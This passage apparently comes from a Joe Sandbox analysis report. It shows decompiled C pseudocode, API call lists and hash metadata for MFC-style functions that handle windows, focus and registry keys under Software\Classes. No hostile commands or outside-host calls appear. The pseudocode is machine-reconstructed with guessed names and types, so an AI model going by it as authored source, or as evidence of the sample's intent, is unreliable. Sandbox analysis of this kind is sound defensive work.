      • __EH_prolog3.LIBCMT ref: 00A04F06
        • Part of subcall function 00A4FCE6: __EH_prolog3.LIBCMT ref: 00A4FCED
        • Part of subcall function 00A840AA: SetRectEmpty.USER32(?), ref: 00A840DA
      • SetRectEmpty.USER32(?), ref: 00A0504E
      • SetRectEmpty.USER32(?), ref: 00A0505D
      • SetRectEmpty.USER32(?), ref: 00A05066
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: EmptyRect$H_prolog3
      • String ID: False$True
      • API String ID: 3752103406-1895882422
      • Opcode ID: c262fdc66379e58c9133a5e7a7989e0d27789253b05392d7e5f8d28e4dfd0cf1
      • Instruction ID: af2027081d51ddf3829a3ecbf59c4fa5511a81309e834f37861968a65633b76e
      • Opcode Fuzzy Hash: c262fdc66379e58c9133a5e7a7989e0d27789253b05392d7e5f8d28e4dfd0cf1
      • Instruction Fuzzy Hash: 4C518DB0801B408FC366DF7AC5857DAFBE8BFA5700F50495ED1AE962A1DBB02644CF51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009ACA5F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110windowCOMMON
      Download Yara Rule
      C-Code - Quality: 96%
      			E009ACA5F(intOrPtr* __ecx, void* __edx) {
				signed int _v8;
				struct HWND__* _v44;
				struct HWND__* _v48;
				intOrPtr _v52;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t34;
				long _t48;
				struct HWND__* _t53;
				long _t66;
				intOrPtr* _t68;
				signed int _t69;
				void* _t76;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				signed int _t81;

				_t76 = __edx;
				_t34 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t34 ^ _t81;
				_t80 = __ecx;
				_t77 = E009B2B03();
				if(_t77 != 0) {
					if( *((intOrPtr*)(_t77 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t77 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t77 + 0x24)) == _t80) {
						 *((intOrPtr*)(_t77 + 0x24)) = 0;
					}
				}
				_t68 =  *((intOrPtr*)(_t80 + 0x64));
				if(_t68 != 0) {
					 *((intOrPtr*)( *_t68 + 0x50))();
					 *((intOrPtr*)(_t80 + 0x64)) = 0;
				}
				_t69 =  *(_t80 + 0x68);
				if(_t69 != 0) {
					 *((intOrPtr*)( *_t69 + 4))(1);
				}
				 *(_t80 + 0x68) =  *(_t80 + 0x68) & 0x00000000;
				_t92 =  *(_t80 + 0x58) & 1;
				if(( *(_t80 + 0x58) & 1) != 0) {
					_t79 =  *((intOrPtr*)(E009BD7B2(1, _t69, _t77, _t80, _t92) + 0x3c));
					if(_t79 != 0) {
						_t94 =  *(_t79 + 0x20);
						if( *(_t79 + 0x20) != 0) {
							E00AAB3F0( &_v56, 0, 0x30);
							_t53 =  *(_t80 + 0x20);
							_v48 = _t53;
							_v44 = _t53;
							_v56 = 0x2c;
							_v52 = 1;
							SendMessageA( *(_t79 + 0x20), 0x405, 0,  &_v56);
						}
					}
				}
				_t78 = GetWindowLongA;
				_t66 = GetWindowLongA( *(_t80 + 0x20), 0xfffffffc);
				E009AC865(_t66, _t80, GetWindowLongA, _t94);
				if(GetWindowLongA( *(_t80 + 0x20), 0xfffffffc) == _t66) {
					_t48 =  *( *((intOrPtr*)( *_t80 + 0xfc))());
					if(_t48 != 0) {
						SetWindowLongA( *(_t80 + 0x20), 0xfffffffc, _t48);
					}
				}
				E009AC996(_t66, _t80, _t76);
				return E00AAB46A( *((intOrPtr*)( *_t80 + 0x120))(), _t66, _v8 ^ _t81, _t76, _t78, _t80);
			}























      0x009aca5f
      0x009aca67
      0x009aca6e
      0x009aca74
      0x009aca7b
      0x009aca81
      0x009aca86
      0x009acaab
      0x009acaab
      0x009acab1
      0x009acab3
      0x009acab3
      0x009acab1
      0x009acab6
      0x009acabb
      0x009acabf
      0x009acac2
      0x009acac2
      0x009acac5
      0x009acacd
      0x009acad2
      0x009acad2
      0x009acad5
      0x009acad9
      0x009acadc
      0x009acae3
      0x009acae8
      0x009acaea
      0x009acaee
      0x009acaf8
      0x009acafd
      0x009acb03
      0x009acb06
      0x009acb17
      0x009acb1e
      0x009acb21
      0x009acb21
      0x009acaee
      0x009acae8
      0x009acb2a
      0x009acb37
      0x009acb39
      0x009acb48
      0x009acb54
      0x009acb58
      0x009acb60
      0x009acb60
      0x009acb58
      0x009acb68
      0x009acb85

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: LongWindow$MessageSend_memset
      • String ID: ,
      • API String ID: 2997958587-3772416878
      • Opcode ID: 540f08a27eb566def3282fd91fad05a9383d8170adb1706efc0cd862a957a1cd
      • Instruction ID: 8fe64429ec2397a384bcb536b4d6c1352259572a2efaa889a4e1ae40dca8df6f
      • Opcode Fuzzy Hash: 540f08a27eb566def3282fd91fad05a9383d8170adb1706efc0cd862a957a1cd
      • Instruction Fuzzy Hash: 8D4170B56017089FCB24EF74D985AAAB7E8FF49710F15062DE5469B692DB30E800CB94
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B3D0B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106registryCOMMON
      Download Yara Rule
      C-Code - Quality: 45%
      			E009B3D0B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t46;
				long _t52;
				void* _t59;
				void* _t62;
				void* _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				void* _t84;

				_t78 = __edx;
				_push(0x12c);
				E00AAD2D1(0xac8383, __ebx, __edi, __esi);
				_t82 =  *((intOrPtr*)(_t84 + 0x10));
				 *((intOrPtr*)(_t84 - 0x124)) =  *((intOrPtr*)(_t84 + 8));
				 *((intOrPtr*)(_t84 - 0x134)) = _t82;
				_t6 = E009A6C6C( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xc)))) - 0x10) + 0x10; // 0x10
				_t80 = _t6;
				 *((intOrPtr*)(_t84 - 0x130)) = _t80;
				 *((intOrPtr*)(_t84 - 4)) = 0;
				if( *((intOrPtr*)(_t84 - 0x124)) == 0x80000000) {
					_t59 = E009BD042();
					_t89 = _t59 - 1;
					if(_t59 == 1) {
						_push(_t84 - 0x130);
						_push("Software\\Classes\\");
						_push(_t84 - 0x128);
						_t62 = E009B3CA7(0, _t78, _t80, _t82, _t89);
						 *((char*)(_t84 - 4)) = 1;
						E009B2357(0, _t84 - 0x130, _t62);
						 *((char*)(_t84 - 4)) = 0;
						E009A5510( *((intOrPtr*)(_t84 - 0x128)) + 0xfffffff0, _t78);
						_t80 =  *((intOrPtr*)(_t84 - 0x130));
						 *((intOrPtr*)(_t84 - 0x124)) = 0x80000001;
					}
				}
				_push(_t84 - 0x12c);
				_push(0x2001f);
				_push(0);
				_push(_t80);
				_push( *((intOrPtr*)(_t84 - 0x124)));
				if(_t82 == 0) {
					_t46 = RegOpenKeyExA();
				} else {
					_t46 = E009B3262(_t82);
				}
				_t83 = _t46;
				if(_t46 != 0) {
					L18:
					_t37 = _t80 - 0x10; // 0x0
					E009A5510(_t37, _t78);
					return E00AAD32D(0, _t80, _t83);
				} else {
					while(1) {
						_t83 = RegEnumKeyA( *(_t84 - 0x12c), 0, _t84 - 0x11c, 0x104);
						_t93 = _t83;
						if(_t83 != 0) {
							break;
						}
						_push(_t84 - 0x11c);
						 *((char*)(_t84 - 4)) = 2;
						E009AFB60(0, _t84 - 0x128, _t78, _t80, _t83, _t93);
						 *((char*)(_t84 - 4)) = 3;
						_t83 = E009B3D0B(0, _t84 - 0x128, _t78, _t80, _t83, _t93,  *(_t84 - 0x12c), _t84 - 0x128,  *((intOrPtr*)(_t84 - 0x134)));
						 *((char*)(_t84 - 0x11d)) = _t83 != 0;
						E009A5510( *((intOrPtr*)(_t84 - 0x128)) + 0xfffffff0, _t78);
						if( *((intOrPtr*)(_t84 - 0x11d)) == 0) {
							 *((intOrPtr*)(_t84 - 4)) = 0;
							continue;
						}
						 *((char*)(_t84 - 4)) = 0;
						break;
					}
					if(_t83 == 0x103 || _t83 == 0x3f2) {
						_t70 =  *((intOrPtr*)(_t84 - 0x134));
						_push(_t80);
						_push( *((intOrPtr*)(_t84 - 0x124)));
						if( *((intOrPtr*)(_t84 - 0x134)) == 0) {
							_t52 = RegDeleteKeyA();
						} else {
							_t52 = E009B39AA(_t70);
						}
						_t83 = _t52;
					}
					RegCloseKey( *(_t84 - 0x12c));
					goto L18;
				}
			}











      0x009b3d0b
      0x009b3d0b
      0x009b3d15
      0x009b3d1d
      0x009b3d20
      0x009b3d2f
      0x009b3d3a
      0x009b3d3a
      0x009b3d3e
      0x009b3d50
      0x009b3d53
      0x009b3d55
      0x009b3d5a
      0x009b3d5d
      0x009b3d65
      0x009b3d6c
      0x009b3d71
      0x009b3d72
      0x009b3d81
      0x009b3d85
      0x009b3d93
      0x009b3d96
      0x009b3d9b
      0x009b3da1
      0x009b3da1
      0x009b3d5d
      0x009b3db1
      0x009b3db2
      0x009b3db7
      0x009b3db8
      0x009b3db9
      0x009b3dc1
      0x009b3dcc
      0x009b3dc3
      0x009b3dc5
      0x009b3dc5
      0x009b3dd2
      0x009b3dd6
      0x009b3ec5
      0x009b3ec5
      0x009b3ec8
      0x009b3ed4
      0x009b3ddc
      0x009b3ddc
      0x009b3df5
      0x009b3df7
      0x009b3df9
      0x00000000
      0x00000000
      0x009b3e05
      0x009b3e0c
      0x009b3e10
      0x009b3e28
      0x009b3e37
      0x009b3e3b
      0x009b3e45
      0x009b3e50
      0x009b3e57
      0x00000000
      0x009b3e57
      0x009b3e52
      0x00000000
      0x009b3e52
      0x009b3e8f
      0x009b3e99
      0x009b3e9f
      0x009b3ea0
      0x009b3ea8
      0x009b3eb1
      0x009b3eaa
      0x009b3eaa
      0x009b3eaa
      0x009b3eb7
      0x009b3eb7
      0x009b3ebf
      0x00000000
      0x009b3ebf

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 009B3D15
      • RegOpenKeyExA.ADVAPI32(80000000,00000010,00000000,0002001F,?), ref: 009B3DCC
        • Part of subcall function 009B3CA7: __EH_prolog3.LIBCMT ref: 009B3CAE
      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 009B3DEF
      • RegCloseKey.ADVAPI32(?), ref: 009B3EBF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseEnumH_prolog3H_prolog3_catch_Open
      • String ID: Software\Classes\
      • API String ID: 854624316-1121929649
      • Opcode ID: 2324af6ae9a4f15594aa31522738e43d877a0e8be1f76ee4cc54d4c6bda8158e
      • Instruction ID: 674aec22f9d8c43765a613a5353c889440cc5e49844f661df057efa73bec67a7
      • Opcode Fuzzy Hash: 2324af6ae9a4f15594aa31522738e43d877a0e8be1f76ee4cc54d4c6bda8158e
      • Instruction Fuzzy Hash: EE416171D011689FCB21EBA48D94BEDBBB8AF49320F0481DAE549A3241D7349F95CF91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B3ED7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105registryCOMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E009B3ED7(void* __ebx, void* __ecx, void __edx, void* __edi, void* __esi, void* __eflags) {
				void _t36;
				void* _t46;
				long _t60;
				void* _t65;
				void* _t81;
				void* _t82;
				intOrPtr _t90;

				_t77 = __edx;
				_t68 = __ecx;
				_t67 = __ebx;
				_push(0x124);
				E00AAD29B(0xac83cc, __ebx, __edi, __esi);
				_t81 = __ecx;
				 *(_t82 - 0x120) = 0;
				 *(_t82 - 0x12c) = 0;
				_t36 = E009B3980(__ecx, __edx);
				 *(_t82 - 0x128) = _t36;
				if(_t36 != 0) {
					do {
						_t65 = _t82 - 0x128;
						_push(_t65);
						_t68 = _t81;
						E009B3991();
						if(_t65 != 0) {
							_t77 =  *_t65;
							_t68 = _t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *(_t82 - 0x128) != 0);
				}
				if( *((intOrPtr*)(_t81 + 0x58)) != 0) {
					_t90 =  *((intOrPtr*)(_t81 + 0x6c));
					_t91 = _t90 == 0;
					if(_t90 == 0) {
						E009B8782(_t68);
					}
					_push("Software\\");
					E009AFB60(_t67, _t82 - 0x11c, _t77, 0, _t81, _t91);
					 *((intOrPtr*)(_t82 - 4)) = 0;
					E009A938A(_t82 - 0x11c,  *((intOrPtr*)(_t81 + 0x58)));
					_push("\\");
					_push(_t82 - 0x11c);
					_push(_t82 - 0x130);
					_t46 = E009B3C43(_t67, _t77, 0, _t81, _t91);
					_push( *((intOrPtr*)(_t81 + 0x6c)));
					 *((char*)(_t82 - 4)) = 1;
					_push(_t46);
					_push(_t82 - 0x124);
					E009B3C43(_t67, _t77, 0, _t81, _t91);
					_t72 =  *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0;
					 *((char*)(_t82 - 4)) = 3;
					E009A5510( *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77);
					_t81 = 0x80000001;
					E009B3D0B(_t67,  *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77, 0, 0x80000001, _t91, 0x80000001, _t82 - 0x124, 0);
					if(RegOpenKeyExA(0x80000001,  *(_t82 - 0x11c), 0, 8, _t82 - 0x120) == 0) {
						_t60 = RegEnumKeyA( *(_t82 - 0x120), 0, _t82 - 0x118, 0x104);
						_t93 = _t60 - 0x103;
						if(_t60 == 0x103) {
							E009B3D0B(_t67, _t72, _t77, 0, 0x80000001, _t93, 0x80000001, _t82 - 0x11c, 0);
						}
						RegCloseKey( *(_t82 - 0x120));
					}
					RegQueryValueA(_t81,  *(_t82 - 0x124), _t82 - 0x118, _t82 - 0x12c);
					E009A5510( &(( *(_t82 - 0x124))[0xfffffffffffffff0]), _t77);
					E009A5510( &(( *(_t82 - 0x11c))[0xfffffffffffffff0]), _t77);
				}
				return E00AAD31E(_t67, 0, _t81);
			}










      0x009b3ed7
      0x009b3ed7
      0x009b3ed7
      0x009b3ed7
      0x009b3ee1
      0x009b3ee8
      0x009b3eea
      0x009b3ef0
      0x009b3ef6
      0x009b3efb
      0x009b3f03
      0x009b3f05
      0x009b3f05
      0x009b3f0b
      0x009b3f0c
      0x009b3f0e
      0x009b3f15
      0x009b3f17
      0x009b3f1e
      0x009b3f20
      0x009b3f20
      0x009b3f23
      0x009b3f05
      0x009b3f2e
      0x009b3f36
      0x009b3f3c
      0x009b3f3e
      0x009b3f40
      0x009b3f40
      0x009b3f45
      0x009b3f50
      0x009b3f5e
      0x009b3f61
      0x009b3f66
      0x009b3f71
      0x009b3f78
      0x009b3f79
      0x009b3f7e
      0x009b3f81
      0x009b3f85
      0x009b3f8c
      0x009b3f8d
      0x009b3f9b
      0x009b3f9e
      0x009b3fa2
      0x009b3faf
      0x009b3fb5
      0x009b3fd3
      0x009b3fe8
      0x009b3fee
      0x009b3ff3
      0x009b3ffe
      0x009b3ffe
      0x009b4009
      0x009b4009
      0x009b4024
      0x009b4033
      0x009b4041
      0x009b4041
      0x009b404e

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009B3EE1
      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000008,?), ref: 009B3FCB
      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 009B3FE8
      • RegCloseKey.ADVAPI32(?), ref: 009B4009
      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 009B4024
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseEnumH_prolog3_OpenQueryValue
      • String ID: Software\
      • API String ID: 1666054129-964853688
      • Opcode ID: 877a3ec906e51605c07d277101d19553822def4bc89e05105aaf034fd44d96f6
      • Instruction ID: d74bd79924b587f1cbb014ca0c797dbdf6b2bc6c7e45967d523ae9cbe7eb0991
      • Opcode Fuzzy Hash: 877a3ec906e51605c07d277101d19553822def4bc89e05105aaf034fd44d96f6
      • Instruction Fuzzy Hash: 82417F31900518ABCB21EB64CD45FEEB7BDAF8A720F10869AF146E2191DB349B91CF50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A87C2 Relevance: 10.6, APIs: 7, Instructions: 101windowCOMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E009A87C2(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t49;
				signed int _t69;
				signed int _t70;
				struct HWND__* _t72;
				signed int _t75;
				void* _t76;

				_t69 = __edx;
				_t61 = __ecx;
				_push(0x1c);
				_t37 = E00AAD232(0xac7cbb, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx + 0xd8)) =  *((intOrPtr*)(__ecx + 0xd8)) + 1;
				if( *((intOrPtr*)(__ecx + 0xd8)) <= 1) {
					_t39 = E009AE492(__ecx, __edi);
					 *((intOrPtr*)(_t76 - 0x10)) = _t39;
					if(_t39 == 0) {
						L2:
						E009B8782(_t61);
					}
					_t75 = 0;
					 *(_t76 - 0x28) = 0xad7ba4;
					 *((intOrPtr*)(_t76 - 0x24)) = 0;
					 *((intOrPtr*)(_t76 - 0x18)) = 0;
					 *((intOrPtr*)(_t76 - 0x1c)) = 0;
					 *(_t76 - 0x20) = 0;
					 *(_t76 - 4) = 0;
					_t72 = GetWindow(GetDesktopWindow(), 5);
					if(_t72 != 0) {
						do {
							_t42 = IsWindowEnabled(_t72);
							_t83 = _t42;
							if(_t42 != 0 && E009AC937(0, _t61, _t69, _t72, _t75, _t83, _t72) != 0 && E009A64A1( *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)) + 0x20)), _t72) != 0 && SendMessageA(_t72, 0x36c, 0, 0) == 0) {
								EnableWindow(_t72, 0);
								_t61 = _t76 - 0x28;
								E00A2601F(_t76 - 0x28, _t75, _t72);
								_t75 =  *(_t76 - 0x20);
							}
							_t72 = GetWindow(_t72, 2);
						} while (_t72 != 0);
						if(_t75 != 0) {
							_t90 = _t75 > 0;
							if(_t75 > 0) {
								goto L2;
							} else {
								_t70 = 4;
								_t18 = _t75 + 1; // 0x1
								_t69 = _t18 * _t70 >> 0x20;
								_t49 = E009A6291(_t90,  ~(0 | _t90 > 0x00000000) | _t18 * _t70);
								_t73 =  *((intOrPtr*)(_t76 - 0x14));
								_t61 = _t75 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x14)) + 0xdc)) = _t49;
								 *((intOrPtr*)((_t75 << 2) + _t49)) = 0;
								if((0 |  *((intOrPtr*)(_t76 - 0x24)) != 0x00000000) == 0) {
									goto L2;
								} else {
									E009A681A( *((intOrPtr*)(_t73 + 0xdc)), _t61,  *((intOrPtr*)(_t76 - 0x24)), _t61);
								}
							}
						}
					}
					 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
					_t37 = E009A8471(0, _t76 - 0x28);
				}
				return E00AAD30A(_t37);
			}












      0x009a87c2
      0x009a87c2
      0x009a87c2
      0x009a87c9
      0x009a87ce
      0x009a87d1
      0x009a87de
      0x009a87e4
      0x009a87eb
      0x009a87f0
      0x009a87f2
      0x009a87f2
      0x009a87f2
      0x009a87f7
      0x009a87f9
      0x009a8800
      0x009a8803
      0x009a8806
      0x009a8809
      0x009a880e
      0x009a881e
      0x009a8822
      0x009a8828
      0x009a8829
      0x009a882f
      0x009a8831
      0x009a8861
      0x009a8869
      0x009a886c
      0x009a8871
      0x009a8871
      0x009a887d
      0x009a887f
      0x009a8885
      0x009a888e
      0x009a8890
      0x00000000
      0x009a8896
      0x009a889a
      0x009a889b
      0x009a889e
      0x009a88a8
      0x009a88ad
      0x009a88b3
      0x009a88b6
      0x009a88bc
      0x009a88c9
      0x00000000
      0x009a88cf
      0x009a88da
      0x009a88df
      0x009a88c9
      0x009a8890
      0x009a8885
      0x009a88e2
      0x009a88e9
      0x009a88e9
      0x009a88f3

      APIs
      • __EH_prolog3.LIBCMT ref: 009A87C9
      • GetDesktopWindow.USER32 ref: 009A8811
      • GetWindow.USER32(00000000), ref: 009A8818
      • IsWindowEnabled.USER32(00000000), ref: 009A8829
      • SendMessageA.USER32 ref: 009A8855
      • EnableWindow.USER32(00000000,00000000), ref: 009A8861
      • GetWindow.USER32(00000000,00000002), ref: 009A8877
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$DesktopEnableEnabledException@8H_prolog3MessageSendThrow
      • String ID:
      • API String ID: 1477819144-0
      • Opcode ID: b5aaf1bbd07cffbc7b682a37262fe9423862b4a677250a4a97638fcf823f90a8
      • Instruction ID: 4b88b55f24bed3f3c04840f43ec8d1a5c6e1a2045b7a53fc0b7f5fd581c80ced
      • Opcode Fuzzy Hash: b5aaf1bbd07cffbc7b682a37262fe9423862b4a677250a4a97638fcf823f90a8
      • Instruction Fuzzy Hash: 77318F72A002159BDB14EFB58D89ABFBABCFF4A704F54453EE112A6191DF358D01CAA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A88F4 Relevance: 10.6, APIs: 7, Instructions: 80windowthreadCOMMON
      Download Yara Rule
      C-Code - Quality: 95%
      			E009A88F4(intOrPtr* __ecx, void* __edx, long _a4) {
				void* __ebx;
				void* _t26;
				signed int _t27;
				long _t40;
				signed int _t43;
				void* _t52;
				intOrPtr* _t55;

				_t52 = __edx;
				_t47 = __ecx;
				_t43 = _a4;
				_t55 = __ecx;
				if(_t43 != 0 && ( *(__ecx + 0x58) & 0x00000004) != 0) {
					E009B0C13(__ecx, 0);
					return SetFocus(0);
				}
				_t26 = E009AC90B(_t43, _t47, _t52, GetParent( *(_t55 + 0x20)));
				if(_t26 == 0) {
					L5:
					if(_t43 != 0) {
						_t27 =  *(_t55 + 0x58);
						if(_t27 < 0) {
							 *(_t55 + 0x58) = _t27 & 0xffffff7f;
							 *((intOrPtr*)( *_t55 + 0x108))();
							_a4 =  *(_t55 + 0x20);
							if(GetActiveWindow() == _a4) {
								SendMessageA(_a4, 6, 1, 0);
							}
						}
						if(( *(_t55 + 0x58) & 0x00000020) != 0) {
							SendMessageA( *(_t55 + 0x20), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t55 + 0xd8)) == 0) {
							 *(_t55 + 0x58) =  *(_t55 + 0x58) | 0x00000080;
							 *((intOrPtr*)( *_t55 + 0x104))();
						}
					}
					asm("sbb ebx, ebx");
					return E009A6EE5(_t55, ( ~_t43 & 0xfffffff0) + 0x20);
				} else {
					_a4 = 0;
					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
					_t40 = GetCurrentProcessId();
					if(_t40 == _a4) {
						return _t40;
					}
					goto L5;
				}
			}










      0x009a88f4
      0x009a88f4
      0x009a88fa
      0x009a8901
      0x009a8905
      0x009a890e
      0x00000000
      0x009a8914
      0x009a8929
      0x009a8930
      0x009a8952
      0x009a8954
      0x009a8971
      0x009a897c
      0x009a8983
      0x009a898a
      0x009a8993
      0x009a899f
      0x009a89aa
      0x009a89aa
      0x009a899f
      0x009a89b0
      0x009a89be
      0x009a89be
      0x009a8956
      0x009a895c
      0x009a8960
      0x009a8969
      0x009a8969
      0x009a895c
      0x009a89c2
      0x00000000
      0x009a8932
      0x009a893a
      0x009a893d
      0x009a8943
      0x009a894c
      0x009a89d6
      0x009a89d6
      0x00000000
      0x009a894c

      APIs
      • SetFocus.USER32(00000000,00000000), ref: 009A8914
      • GetParent.USER32(?), ref: 009A8922
      • GetWindowThreadProcessId.USER32(?,?), ref: 009A893D
      • GetCurrentProcessId.KERNEL32 ref: 009A8943
      • GetActiveWindow.USER32 ref: 009A8996
      • SendMessageA.USER32 ref: 009A89AA
      • SendMessageA.USER32 ref: 009A89BE
